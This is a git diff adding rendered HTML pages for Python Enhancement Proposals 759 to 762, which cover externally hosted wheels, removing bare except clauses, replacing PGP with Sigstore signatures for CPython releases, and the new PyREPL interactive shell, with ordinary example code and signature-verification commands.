The only effect of a .rim file is to change the download URL for the wheel artifact in both the HTML and JSON interfaces of the simple repository API. In the HTML page for a package release, the href attribute MUST be the value of the uri key, including a #<hashname>=<hashvalue> fragment. This hash fragment MUST be in exactly the same format as described for the PEP 376 originated signed wheel file format in the .dist-info/RECORD file. The exact same rules for the selection of hash algorithm and encoding are used here.

+

Similarly, in the JSON response, the url key pointing to the download file MUST be the value of the uri key, and the hashes dictionary MUST be included, with values populated from the hashes dictionary provided above.

+

In all other respects, a compliant package index should treat .rim files the same as +.whl files, with some other minor exceptions as outlined below. For example, .rim +files can be deleted and yanked (PEP 592) just +like any .whl file, with the exact same semantics (i.e. deletions are permanent). When +a .rim is deleted, an index MUST NOT allow a matching .whl or .rim file to +be (re-)uploaded.

+
+
+

Availability order

+

Externally hosted wheels MUST be available before the corresponding .rim file is +uploaded to PyPI, otherwise a publishing race condition is introduced, although this +requirement MAY be relaxed for .rim files uploaded to a PEP 694 staged release.

+
+
+

Wheels can override RIMs

+

Indexes MUST reject .rim files if a matching .whl file already exists with the +exact same file name tags. However, indexes MAY accept a .whl file if a matching +.rim file exists, as long as that .rim file hasn’t been deleted or yanked. This +allows uploaders to replace an externally hosted wheel file with an index hosted wheel +file, but the converse is prohibited. Since the default is to host wheels on the same +package index that contains the package metadata, it is not allowed to “downgrade” an +existing wheel file once uploaded. When a .whl replaces a .rim, the index MUST +provide download URLs for the package using its own hosted file service. When uploading +the overriding .whl file, the package index MUST validate the hash from the +existing .rim file, and these hashes must match or the overriding upload MUST be +rejected.

+
+
+

PyPI API bump unnecessary

+

It’s likely that the changes are backward compatible enough that a bump in the PyPI +repository version is not necessary. Since .rim files are essentially changes only +to the upload API, package resolvers and package installers can continue to function with +the APIs they’ve always supported.

+
+
+
+

External hosting resiliency

+

One of the key concerns leading to PEP 438’s revocation in PEP 470 was +potential user confusion when an external index disappeared. From PEP 470:

+
+
This confusion comes down to end users of projects not realizing if a +project is hosted on PyPI or if it relies on an external service. This +often manifests itself when the external service is down but PyPI is +not. People will see that PyPI works, and other projects works, but this +one specific one does not. They oftentimes do not realize who they need to +contact in order to get this fixed or what their remediation steps are.
+

While the problem of external wheel hosting service going down is not directly +solved by this PEP, several safeguards are in place to greatly reduce the +potential burden on PyPI administrators.

+

This PEP thus proposes that:

+
    +
  • External wheel hosting is only allowed for packages which are owned by +organization accounts. +External hosting is an organization-wide setting.
  • +
  • Organization accounts do not automatically gain the ability to externally +host wheels; this feature MUST be explicitly enabled by PyPI admins at their discretion. Since +this will not be a common request, we don’t expect the overhead to be nearly +as burdensome as PEP 541 resolutions, account recovery requests, or even +file/project size increase requests. External hosting requests would be +handled in the same manner as those requests, i.e. via the PyPI GitHub +support tracker.
  • +
  • Organization accounts requesting external wheel hosting MUST register their own +support contact URI, be it a mailto URI for a contact email address, or the URL to +the organization’s support tracker. Such a contact URI is optional for organizations +which do not avail themselves of external wheel file hosting.
  • +
+

Combined with the EXTERNAL-HOSTING.json file’s owner key, this allows for +installer tools to unambiguously redirect any download errors away from the PyPI support +admins and squarely to the organization’s support admins.

+

While the exact mechanics of storing and retrieving this organization support URL will be defined separately, for the sake of example, let’s say a package foo externally hosts wheel files on https://foo.example.com and that host becomes unreachable. When an installer tool tries to download and install the package foo wheel, the download step will fail. The installer would then be able to query PyPI to provide a useful error message to the end user:

+
    +
  • The installer downloads the .rim file and reads the owner key from the +EXTERNAL-HOSTING.json file inside the .rim zip file.
  • +
  • The installer queries PyPI for the support URI for the organization +owner of the externally hosted wheel.
  • +
  • An informative error message would then be displayed, e.g.:
    +
    The externally hosted wheel file foo-....whl could not be +downloaded. Please contact support@foo.example.com for help. Do not report +this to the PyPI administrators.
    +
  • +
+
+
+

Dismounting wheels

+

It is generally very easy to produce a .rim file from an existing .whl file. This could be done efficiently by a PEP 517 build backend with an additional command line option, or by a separate tool which takes a .whl file as input and creates the associated .rim file. To complete the analogy, the act of turning a .whl into a .rim is called “dismounting”. The steps such a tool would take are listed below; a sketch of such a tool follows the list:

+
    +
• Accept as input the source .whl file, the organization owner of the package, the URL at which the .whl will be hosted, and the support URI to which download problems should be reported. These could in fact be captured in the pyproject.toml file, but that specification is out of scope for this PEP.
  • +
  • Unzip the .whl and create the .rim zip archive.
  • +
  • Omit from the .rim file any path in the .whl that isn’t rooted +at the .dist-info directory.
  • +
  • Calculate the hash of the source .whl file.
  • +
  • Add the EXTERNAL-HOSTING.json file containing the JSON keys and values as described +above, to the .rim archive.
  • +
+
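
The following is a minimal sketch of such a tool, assuming the hypothetical helper name dismount() and the EXTERNAL-HOSTING.json keys described above:

import hashlib
import json
import zipfile
from pathlib import Path

def dismount(whl_path: str, owner: str, url: str) -> Path:
    """Turn a .whl into the corresponding .rim (hypothetical helper)."""
    whl = Path(whl_path)
    data = whl.read_bytes()
    external = {
        "version": "1.0",
        "owner": owner,
        "uri": url,
        "size": len(data),
        "hashes": {"sha256": hashlib.sha256(data).hexdigest()},
    }
    rim = whl.with_suffix(".rim")
    with zipfile.ZipFile(whl) as src, zipfile.ZipFile(rim, "w") as dst:
        dist_info = None
        for name in src.namelist():
            # Omit any path not rooted at the .dist-info directory.
            top = name.split("/", 1)[0]
            if top.endswith(".dist-info"):
                dist_info = top
                dst.writestr(name, src.read(name))
        if dist_info is None:
            raise ValueError(f"no .dist-info directory in {whl}")
        # Add the EXTERNAL-HOSTING.json file described above.
        dst.writestr(dist_info + "/EXTERNAL-HOSTING.json",
                     json.dumps(external, indent=2))
    return rim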
+
+

Changes to tools

+

Theoretically, installer tools shouldn’t need any changes, since when they +have identified the wheel to download and install, they simply consult the +download URLs returned by PyPI’s Simple API. In practice though, tools such as +pip and uv may have constrained lists of hosts they will allow +downloads from, such as PyPI’s own pythonhosted.org domain.

+

In this case, such tools will need to relax those constraints, but the exact policy for +this is left to the installer tools themselves. Any number of approaches could be +implemented, such as downloading the .rim file and verifying the +EXTERNAL-HOSTING.json metadata, or simply trusting the external downloads for any +wheel with a matching checksum. They could also query PyPI for the project’s organization +owner and support URI before trusting the download. They could warn the user when +externally hosted wheel files are encountered, and/or require the use of a command line +option to enable additional download hosts. Any of these verification policies could be +chosen in configuration files.

+

Installer tools should also probably provide better error messages when +externally hosted wheels cannot be downloaded, e.g. because a host is +unreachable. As described above, such tools could query enough metadata from +PyPI to provide clear and distinct error messages pointing users to the +package’s external hosting support email or issue tracker.

+
+
+

Constraints for external hosting services

+

The following constraints lead to reliable and compatible external wheel hosting services:

+
    +
• External wheels MUST be served over HTTPS, with a certificate chaining up to Mozilla’s root certificate store. This ensures compatibility with pip and uv. At the time of this writing, pip 24.2 on Python 3.10 or newer uses the system certificate store in addition to the Mozilla store provided by the third party certifi Python package. uv uses the Mozilla store provided by the webpki-roots crate, but not the system store unless the --native-tls flag is given [1]. The PyPI administrators may modify this requirement in the future, but compatibility with popular installers will not be compromised.
  • +
  • External wheel hosts SHOULD use a content delivery network (CDN), just as PyPI does.
  • +
  • External wheel hosts MUST commit to a stable URL for all wheels they host.
  • +
  • Externally hosted wheels MUST NOT be removed from an external wheel host unless the +corresponding .rim file is deleted from PyPI first, and MUST NOT remove external +wheels for yanked releases.
  • +
  • External wheel hosts MUST support HTTP range requests.
  • +
  • External wheel hosts SHOULD support the HTTP/2 protocol.
  • +
+
+
+

Security

+

Several factors as described in this proposal should mitigate security +concerns with externally hosted wheels, such as:

+
    +
  • Wheel file checksums MUST be included in .rim files, and once uploaded cannot be +changed. Since the checksum stored on PyPI is immutable and required, it is not possible +to spoof an external wheel file, even if the owning organization lost control of their +hosting domain.
  • +
  • Externally hosted wheels MUST be served over HTTPS.
  • +
  • In order to serve externally hosted wheels, organizations MUST be approved by the +PyPI admins.
  • +
+

When users identify malware or vulnerabilities in PyPI-hosted projects, they can now +report this using the malware reporting facilities on +PyPI, as also described in this blog post. The same process can be used to report +security issues in externally hosted wheels, and the same remediation process should be +used. In addition, since organizations with external hosting enabled MUST provide a +support contact URI, that URI can be used in some cases to report the security issue to +the hosting organization. Such organization reporting won’t make sense for malware, but +could indeed be a very useful way to report security vulnerabilities in externally hosted +wheels.

+
+
+

Rejected ideas

+

Several ideas were considered and rejected.

+
    +
  • Requiring digital signatures on externally hosted wheel files, either in +addition to or other than hashes. We deem this unnecessary since the +checksum requirement should be enough to validate that the metadata on PyPI +for a wheel exactly matches the downloaded wheel. The added complexity of +key management outweighs any additional benefit such digital signatures +might convey.
  • +
  • Hash verification on .rim file uploads. PyPI could verify that the hash in the +uploaded .rim file matches the externally hosted wheel before it accepts the upload, +but this requires downloading the external wheel and performing the checksum, which also +implies that the upload of the .rim file cannot be accepted until this external +.whl file is downloaded and verified. This increases PyPI bandwidth and slows down +the upload query, although PEP 694 draft uploads could potentially mitigate these +concerns. Still, the benefit is not likely worth the additional complexity.
  • +
  • Periodic verification of the download URLs by the index. PyPI could try to periodically +ensure that the external wheel host or the external .whl file itself is still +available, e.g. via an HTTP HEAD request. This is likely overkill and without also +providing the file’s checksum in the response [2], may not provide much additional +benefit.
  • +
  • This PEP could allow for an organization to provide fallback download hosts, +such that a secondary is available if the primary goes down. We believe +that DNS-based replication is a much better, well-known technique, and +probably much more resilient anyway.
  • +
  • .rim file replacement. While it is allowed for .whl files to replace +existing .rim files, as long as a) the .rim file hasn’t been deleted +or yanked, b) the checksums match, we do not allow replacing .whl files +with .rim files, nor do we allow a .rim file to overwrite an +existing .rim file. This latter could be a technique to change the +hosting URL for an externally hosted .whl; however, we do not think this +is a good idea. There are other ways to “fix” an external host URL as +described above, and we do not want to encourage mass re-uploads of existing +.rim files.
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0759.rst

+

Last modified: 2024-10-09 20:11:15 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0760/index.html b/pep-0760/index.html new file mode 100644 index 00000000000..fbc8f964b05 --- /dev/null +++ b/pep-0760/index.html @@ -0,0 +1,328 @@ + + + + + + + + PEP 760 – No More Bare Excepts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 760 – No More Bare Excepts

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, Brett Cannon <brett at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
02-Oct-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes disallowing bare except: clauses in Python’s +exception-handling syntax. Currently, Python allows catching all exceptions +with a bare except: clause, which can lead to overly broad exception +handling and mask important errors. This PEP suggests requiring explicit +exception types in all except clauses, promoting more precise and intentional +error handling.

+
+
+

Motivation

+

The current syntax allows for catching all exceptions with a bare except: clause:

+
try:
+    risky_operation()
+except:
+    handle_any_error()
+
+
+

While this syntax can be convenient for a “catch all” handler, it often leads +to poor coding practices:

+
    +
1. It can mask important errors that should be propagated.
2. It makes debugging more difficult by catching and potentially hiding unexpected exceptions.
3. It goes against the Python principle of explicit over implicit.
+

Various linters [1] [2] [3] and style guides (including PEP 8) [4] [5] +[6] [7] discourage bare except clauses.

+

By requiring explicit exception types, we can encourage more thoughtful and +precise error handling:

+
try:
+    risky_operation()
+except Exception as e:
+    handle_expected_error(e)
+
+
+

Another view of this problem is that bare except handlers are ambiguous +regarding the intended handling of terminating exceptions, as the intention +could have been either:

+
    +
  • Only catch non-terminating exceptions (except Exception:). If this was the +intention, using a bare except: is an outright bug, since that isn’t what it +means.
  • +
• Catch all exceptions, including terminating ones (except BaseException:). Using a bare except: here is at least correct, but readers need to check to be sure it isn’t an instance of the first case.
  • +
+

Since both possible intentions have available unambiguous spellings, the +ambiguous form is redundant and that’s why we propose to disallow it.

+
+
+

Rationale

+

The decision to disallow bare except clauses is based on the following +considerations:

+
    +
1. Requiring specific exception types makes the programmer’s intentions clear and encourages thinking about what exceptions might occur.
2. Catching only specific exceptions makes identifying and debugging unexpected errors easier.
3. Preventing overly broad exception handling reduces the risk of silently ignoring critical errors.
4. Many style guides and linters already discourage the use of bare except clauses.
+
+
+

Specification

+

The syntax for the except clause will be modified to require an exception type. +The grammar will be updated to remove the possibility of adding an empty +expression in except clauses.

+

This change disallows the bare except: syntax. All except clauses must +specify at least one exception type:

+
try:
+    ...
+except ValueError:
+    ...
+except (TypeError, RuntimeError):
+    ...
+except Exception:
+    ...  # Still allowed, but catches all exceptions explicitly
+
+
+

The semantics of exception handling remain unchanged, except that it will no +longer be possible to catch all exceptions without explicitly specifying +BaseException or a similarly broad exception type.

+
+
+

Backwards Compatibility

+

This change is not backwards compatible. Existing code that uses bare except: +clauses will need to be modified. To ease the transition:

+
    +
1. A deprecation warning will be issued for bare except clauses in Python 3.14.
2. The syntax will be fully disallowed in Python 3.17.
3. A from __future__ import strict_excepts will be provided to invalidate bare except handlers in earlier versions of Python.
+

A tool will be provided to automatically update code to replace bare except: +with except BaseException:.

+
+
+

Security Implications

+

This change has no security implications.

+
+
+

How to Teach This

+

For new Python users, exception handling should be taught with explicit +exception types from the start:

+
try:
+    result = risky_operation()
+except ValueError:
+    handle_value_error()
+except TypeError:
+    handle_type_error()
+except Exception as e:
+    handle_unexpected_error(e)
+
+
+

For experienced users, the change can be introduced as a best practice that is +now enforced by the language. The following points should be emphasized:

+
    +
1. Always catch specific exceptions when possible.
2. Use except Exception: as a last resort for truly unexpected errors.
3. Never silence exceptions without careful consideration.
+

Documentation should provide guidance on common exception hierarchies and how to choose appropriate exception types to catch.

+
+
+

Rejected ideas

+
    +
• There are genuine cases where the use of bare except: handlers is correct. One of the examples that has been raised, from Mailman [8], involves handling transactions in the face of any exception:
    +
    @contextmanager
    +def transaction():
    +    """Context manager for ensuring the transaction is complete."""
    +    try:
    +        yield
    +    except:
    +        config.db.abort()
    +        raise
    +    else:
    +        config.db.commit()
    +
    +
    +
    +

    This code guarantees that no matter what exception occurs, any open +transaction will be aborted, while in the successful condition, the +transaction will be committed.

    +

    We do believe that although there are cases such like this one where +bare except: handlers are correct, it would be better to actually +be explicit and use except BaseException: for the reasons indicated +in the “Motivation” section.

    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0760.rst

+

Last modified: 2024-10-09 20:43:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0761/index.html b/pep-0761/index.html new file mode 100644 index 00000000000..63f6e673ff5 --- /dev/null +++ b/pep-0761/index.html @@ -0,0 +1,409 @@ + + + + + + + + PEP 761 – Deprecating PGP signatures for CPython artifacts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 761 – Deprecating PGP signatures for CPython artifacts

+
+
Author:
+
Seth Michael Larson <seth at python.org>
+
Sponsor:
+
Hugo van Kemenade
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
08-Oct-2024
+
Python-Version:
+
3.14
+
Post-History:
+
25-Sep-2024, 09-Oct-2024
+
Resolution:
+
06-Nov-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Since Python 3.11.0, CPython has provided two verifiable digital signatures +for all CPython artifacts: PGP and Sigstore.

+

PGP’s design requires the maintenance and protection of long-lived private +keys by trusted +parties. PGP’s security and ergonomics have been criticized by security +practitioners +for many years now, with the biggest issue being that there were few +alternatives for “artifact signing” being proposed or adopted.

+

Sigstore’s design philosophy has focused on the +ergonomics of signing and verifying and uses short-lived keys with +strongly-bound human-readable identities via OpenID Connect. +Sigstore has both development and adoption momentum, seeing adoption by PyPI, +NPM, Homebrew, and GitHub, among other ecosystems.

+

This PEP proposes to move CPython to using Sigstore exclusively for signing +artifacts through a deprecation and eventual discontinuance of providing PGP +signatures with new release managers.

+
+
+

Motivation

+

CPython’s releases are release-manager-centric, where a single person +maintains multiple CPython releases from pre-release to end-of-life over the +course of many years.

+

Requiring release managers to maintain and protect PGP private keys for seven +or more years is an unnecessary burden in the new age of ergonomic and +ephemeral signing keys. Comparatively, Sigstore only requires release managers +to click a button during the release process to OAuth sign-on to their +identity provider. Maintaining the integrity of accounts on identity providers +like GitHub is already an expectation of being a Python release manager or +core team member, such as through multi-factor authentication and strong +unique passwords.

+
+
+

Rationale

+
+

Preserve expectations across a Python release

+

To avoid breaking downstream verifiers, the expectations for verification +materials availability SHOULD NOT be changed during a feature release’s +lifecycle.

+
+
+

Release managers, not releases

+

The discontinuation of PGP signatures doesn’t necessarily have to happen +on a “release manager boundary”; a new Python release could be a potential +boundary.

+

Because the primary motivation for deprecating PGP is ergonomics, deciding +to drop PGP for one release while a release manager still has obligations to +provide PGP signatures for other releases for multiple years isn’t much +savings of effort.

+

A new release manager also represents a new PGP public key that downstream +verifiers need to adopt. By choosing to make the change during this period, +this minimizes the breakage to a place in downstream maintenance where a +change will already be necessary.

+
+
+

Gordian knot of signing methods and verifiers

+

CPython providing both PGP and Sigstore signatures concurrently creates a +“Gordian knot” where +verifiers are disincentivized to migrate to a new signature method due to the +continued and expected availability of an existing signature method, thus +propagating the apparent demand for maintaining the existing signature +method.

+

This situation slows down the adoption of new signature methods like Sigstore for +both signature-producing projects and signature-verifying ecosystems by not +creating a “need” to automate and integrate the signature method into verifier +tooling.

+

By changing the expectation of what future signature methods will be +available, the incentive-knot can be broken by spurring the adoption of the +new signature method in downstream tooling. +This change to verifier tooling also makes other upstream projects able to +migrate to publishing only Sigstore signatures, resulting in a positive +feedback loop of adoption.

+
+
+
+

Specification

+

Because PGP keys are tied to a release manager identity, the change to +availability of PGP signatures will be tied to release managers instead of +individual releases (3.13, 3.14, etc). This PEP both deprecates and proposes +a discontinuation timeline for PGP signatures.

+
+

Deprecation and discontinuation of PGP signatures

+

This PEP deprecates PGP signatures for future CPython releases and recommends +verifiers to adopt Sigstore to verify CPython artifacts as an alternative to +PGP.

+

This PEP also removes the expectation that PGP signatures be published by +future release managers that don’t already maintain a stable Python release. +At the time of writing this would be Hugo van Kemenade, as 3.14 is the next +Python version without a stable release.

+

Releases which already have a stable release (3.13, 3.12, 3.11, etc) are not +affected and will continue to provide PGP signatures for artifacts until they +are end-of-life. All existing PGP signatures will continue to work as +expected.

+
+
+

Delaying discontinuation of PGP signatures

+

This PEP provides a mechanism to delay the discontinuation of PGP signatures +from active and upcoming CPython releases in case of extraordinary +circumstances. Deprecation of PGP signatures can’t be changed without a +superseding PEP.

+

The Steering Council MAY at a future date after this PEP’s acceptance decide +to delay the discontinuation of PGP signatures to a future CPython release. +If the Steering Council decides to delay the discontinuation of PGP signatures +then all active release managers MUST provide PGP signatures for their covered +CPython artifacts for the remainder of their tenure as a release manager. This +includes all steps required to do so, such as generating a new PGP key and +publishing their identity to python.org.

+

The discontinuation of PGP signatures then is automatically scheduled for the +next release manager without a stable release, to be highlighted in the +Steering Council decision.

+
+
+
+

Backwards Compatibility

+

This proposal would remove the ability to verify future CPython artifacts +using PGP. Any downstream verifiers using PGP for CPython artifacts would +need to either start using Sigstore, verify their source code of CPython +through other means, or stop verification altogether for future CPython +releases.

+
+
+

Security Implications

+

PGP and Sigstore have different security models, so by removing PGP +signatures this means that all users only have the option to rely on the +security model provided by Sigstore.

+

In general, the security model required for artifact signatures is being +able to detect whether a given artifact is from the expected source and +hasn’t been modified, regardless of the security or integrity of the hosting +service (in CPython’s case: python.org/downloads).

+

Sigstore’s security model +depends more on centralized infrastructure compared to PGP, such as the +“public good” signature transparency log (Rekor), certificate authority and +transparency log (Fulcio), and the security of OpenID Connect identity +providers like Google and GitHub.

+

CPython’s development already depends on the security of some of these +services and the others are better resourced than any individual release +manager to provide long-term public key management.

+
+
+

How to Teach This

+

CPython already documents +how to verify artifacts using Sigstore based on the pre-published identities +of release managers. Documentation will be updated to indicate the deprecation +and future expectations of PGP signatures.

+
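
For example, verifying a CPython 3.13.0 tarball with the sigstore-python client looks roughly like this (the release manager identity is taken from the Cosign example in the appendix below):

python -m pip install sigstore
python -m sigstore verify identity \
  --cert-identity thomas@python.org \
  --cert-oidc-issuer https://accounts.google.com \
  Python-3.13.0.tgz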

Verifying signatures of CPython artifacts isn’t something we should expect +from new Python users. Instead, Sigstore is more likely to be a part of a +downstream integrator’s build pipeline such as a Linux distro, Homebrew, pyenv, +or others that programmatically fetch and build CPython from source.

+
+
+

Rejected Ideas

+
+

Continue publishing PGP signatures indefinitely

+

Being a release manager is already a difficult, time-consuming, and long-term +commitment that is typically done on a volunteer basis. Thus we see removal +of PGP key management duties as a step towards reducing burnout and stress +of future release managers and improving the sustainability of CPython.

+
+
+

Removing previous PGP signatures

+

This PEP doesn’t intend to break any infrastructure built around existing Python +versions, instead only changing the expectations around future Python versions. +Thus all PGP signatures that are already available on python.org will continue +to be available even after PGP discontinuance.

+
+
+
+

Appendix

+
+

Support for offline verification

+

During the pre-PEP discussion, +there was a question of whether offline verification was supported by +Sigstore. Using a Sigstore bundle (.sigstore) file, Sigstore clients +support verifying the artifact completely offline.

+

Using offline verification with Sigstore requires disabling root of trust +updates and “pinning” a root of trust in a file to use during verification.

+

Pinning a root of trust means signatures made after a new root of trust +is established would no longer be able to verify using a “pinned” previous +root of trust. New roots of trust are expected to be rare events, such as +when the root of trust is compromised, and in this case verifiers would +want signatures to fail to verify.

+

Offline verification also makes revocation checks impossible, but this +is similar to PGP’s model where revocation of keys requires an online lookup.

+

Barring rare events like root of trust compromise, using offline verification +with Sigstore doesn’t impose additional operations requirements to verifiers.

+
+
+

Support for a pre-compiled executable for verification

+

During discussion there were requests for a pre-compiled executable that could +be used for verifying Sigstore bundles without needing to either install +a Go build toolchain to build sigstore-go +from source or already have a working Python installation for +sigstore-python.

+

Cosign is another Sigstore project +that provides pre-compiled standalone binaries and supports verifying bundles +offline:

+
# Download Cosign
+wget https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64
+
+# For offline verification, also need the Root of Trust. Can be grabbed
+# from GitHub at: https://github.com/sigstore/root-signing/blob/main/targets/trusted_root.json
+wget https://raw.githubusercontent.com/sigstore/root-signing/refs/heads/main/targets/trusted_root.json
+
+# Download CPython artifacts
+wget https://www.python.org/ftp/python/3.13.0/Python-3.13.0.tgz
+wget https://www.python.org/ftp/python/3.13.0/Python-3.13.0.tgz.sigstore
+
+./cosign-linux-amd64 verify-blob \
+  --new-bundle-format \
+  --certificate-oidc-issuer 'https://accounts.google.com' \
+  --certificate-identity 'thomas@python.org' \
+  --bundle ./Python-3.13.0.tgz.sigstore \
+  # --offline and --trust-root optional for offline verification
+  --offline \
+  --trust-root ./trusted_root.json \
+  ./Python-3.13.0.tgz
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0761.rst

+

Last modified: 2024-11-06 19:20:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0762/index.html b/pep-0762/index.html new file mode 100644 index 00000000000..ec52f767af9 --- /dev/null +++ b/pep-0762/index.html @@ -0,0 +1,374 @@ + + + + + + + + PEP 762 – REPL-acing the default REPL | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 762 – REPL-acing the default REPL

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>, Łukasz Langa <lukasz at python.org>, Lysandros Nikolaou <lisandrosnik at gmail.com>, Emily Morehouse-Valcarcel <emily at python.org>
+
Sponsor:
+
Pablo Galindo Salgado
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
11-Oct-2024
+
Python-Version:
+
3.13
+
+
+
+
Table of Contents +
+
+

Abstract

+

One of Python’s core strengths is its interactive mode, also known as the +Read-Eval-Print Loop (REPL), or the Python console, or the Python shell. This +PEP describes the new implementation of this functionality written in Python. +The new REPL released in Python 3.13 aims to provide modern features expected by +today’s users, such as multi-line editing, syntax highlighting, custom commands, +and an overall improved interactive experience.

+
+
+

Motivation

+

Up to Python 3.12, the interactive shell of CPython was written in C as a +special mode of the parser. It was therefore difficult to maintain and extend. +It relied on the existence of GNU readline (or an equivalent) for basic +functionality like cursor movement and history tracking. Python compiled without +this library provided an interactive mode of very limited capability. On the +other hand, Python compiled with readline outsourced decisions and configuration +around user input in ways that made extending it difficult.

+

This complexity has deterred contributions and has made it challenging to +implement new features. As a result, the CPython interactive shell has seen +minimal changes, falling behind user expectations for modern equivalents.

+

Many features that users have come to expect from modern REPLs were absent in +the previous version. Some examples of these features include multi-line editing +and history, custom commands, syntax highlighting, or ergonomic handling of copy +and paste. The lack of these features greatly impacts the user experience of +many groups of users of CPython, in particular in environments where users don’t +control dependencies and cannot install their own packages. This is especially +common for users learning the language and educators.

+

Addressing such issues with the C implementation would require complex +workarounds, such as AST matching of commands, which would add prohibitive +complexity to the codebase.

+

With the new REPL written in Python, we are addressing these limitations while +also bringing CPython’s interactive experience more in line with modern +expectations and capabilities.

+
+
+

Rationale

+

Implementing the new REPL in Python, rather than C, has significantly lowered +the barrier to entry for contributors. This change has made it easier to test, +validate, and modify the REPL, leading to increased community involvement and +faster feature development. The improved accessibility of the codebase is +expected to result in a more rapidly evolving and user-responsive REPL.

+

Instead of writing a Python REPL from scratch, we decided to base the +implementation of the new REPL on PyREPL. +This decision was driven by several key factors. First and foremost, +developing a terminal application that works consistently across different +operating systems and terminal emulators is a complex undertaking. +By adopting PyREPL, which has been battle-tested in the PyPy project, +we can leverage existing, proven code rather than starting from scratch.

+

Sharing a codebase with PyPy for the REPL implementation offers mutual benefits +to both projects. It allows for shared maintenance efforts, faster bug fixes, +and feature improvements that can benefit users of both CPython and PyPy. This +collaboration can lead to a more robust and feature-rich REPL for the entire +Python ecosystem.

+

The previous REPL written in C leveraged the “readline” or “editline” libraries +as a backend to allow certain features such as navigation, history preservation +and recall, autocompletion, and configurable keyboard behavior. PyREPL does not +use those libraries, implementing most of the other functionality directly as +part of the shell. The main missing functionality (configurability of input) is +outweighed by the benefits of the new architecture. The configuration files for +these libraries (e.g. inputrc) are complex and include features that PyREPL +doesn’t plan to implement, making it infeasible to transparently add support for +them in the new shell. Using “readline” or “editline” in PyREPL would be +prohibitively complex due to multi-line editing handling and multiplatform +support.

+

Although this means that existing readline/editline configurations will not be +compatible with the PyREPL, we believe the enhanced features and improved +extensibility are an overall win. See “Backwards Compatibility” for discussion +of continued support for customized workflows.

+

The previous REPL made it challenging to properly implement custom commands, +which is a very common feature of interactive shells. For instance, the exit +command was implemented as a method call of a custom object injected in the +global namespace, leading to unintuitive behavior that often confuses users when +they simply type exit, as the interpreter prompts them to the supposedly +correct usage exit().

+
+
+

Specification

+

PyREPL is implemented as a new private Python module called _pyrepl, existing +alongside the current C implementation. In its first implementation, it +introduces the following key features:

+
    +
  1. Multi-line History and Editing: Users are able to navigate and edit their +command history across multiple lines, improving the ability to refine and reuse +complex blocks of code.

    Editing multi-line blocks provides automatic indentation using four spaces, which +is consistent with PEP 8 recommendations. When a line ending with a colon is +encountered, the following line is automatically indented utilizing the +indentation pattern that is inferred from the first line that contains +indentation. Lines are indented with four spaces, and tabs are converted into +spaces.

    +

    Users can access history of commands by using up and down arrows. Within +a multi-line entry, the arrow keys navigate line-by-line within the block before +moving to the next history entry. The down arrow works in reverse, navigating +from older entries to the most recent.

    +

    History can be searched forward (using Ctrl+S) and in reverse (using Ctrl+R) +using a custom-specified substring query. It can also be searched with a prefix +query by entering the prefix into a shell line and using PageUp and PageDown +keys.

    +
+
  2. Copying and Pasting: in supported terminal emulators, bracketed pasting capability is discovered and used by PyREPL. This allows for transparent pasting of blocks of code without immediate execution or invalid automatic indentation.

    For terminal emulators that don’t support this mode, a dedicated paste mode is +implemented to allow for easy insertion of multi-line code snippets without +triggering immediate execution or indentation issues.

    +

    Users enter manual paste mode by hitting the F3 key. The prompt changes from +>>> to (paste) where users can paste contents from their clipboard or +manually type as desired. Once the content is ready, hitting F3 exits paste +mode. Then, pressing Enter executes the block.

    +

Users can enter multiple commands on a single input when using paste mode, which makes it easier to paste code from other sources.

    +

    To copy blocks of code without the leading command prompts and without the +output of the commands, users can enter the history view via the F2 key. This +mode uses a pager to display history of executed commands without the prompts +and output.

    +
+
  3. Help via F1.

The standard Help module is accessible via a Custom Command help (see below) or via the F1 key. Hit F1 to enter help mode. When you’re done, hit F1 or a standard command (q, quit or exit) to exit.

    +

    Browsing interactive help does not retain command history.

    +
+
  4. Custom Commands: The REPL supports the implementation of custom commands, such as exit, in a more natural and user-friendly manner, avoiding the current function call workaround.

    The initial list of custom commands includes:

    +
      +
    • exit
    • +
    • quit
    • +
    • copyright
    • +
    • help
    • +
    • clear
    • +
    +

Commands are available as long as there is no name conflict with a variable in a reachable scope. For example, after assigning exit = 1, the variable will take precedence over PyREPL commands. del exit in this case will remove the conflict and the command will function again. A short session illustrating this behavior appears after this list.

    +
+
  5. Colors: the prompts as well as certain elements of the output, like exception tracebacks, are now colored. Colors can be disabled using the standard NO_COLOR environment variable, or forced by using the standard FORCE_COLOR environment variable. A Python-specific environment variable is also available called PYTHON_COLORS. The initial implementation in Python 3.13 does not offer customization of the color theme.
  +
+
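To illustrate the name-conflict rule for custom commands described in this list, a session could look like the following (a constructed example based on the behavior described above, not a captured PyREPL transcript):

>>> exit = 1     # a variable named "exit" now shadows the command
>>> exit         # evaluates the variable instead of exiting
1
>>> del exit     # removes the conflict
>>> exit         # the custom command works again and ends the session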

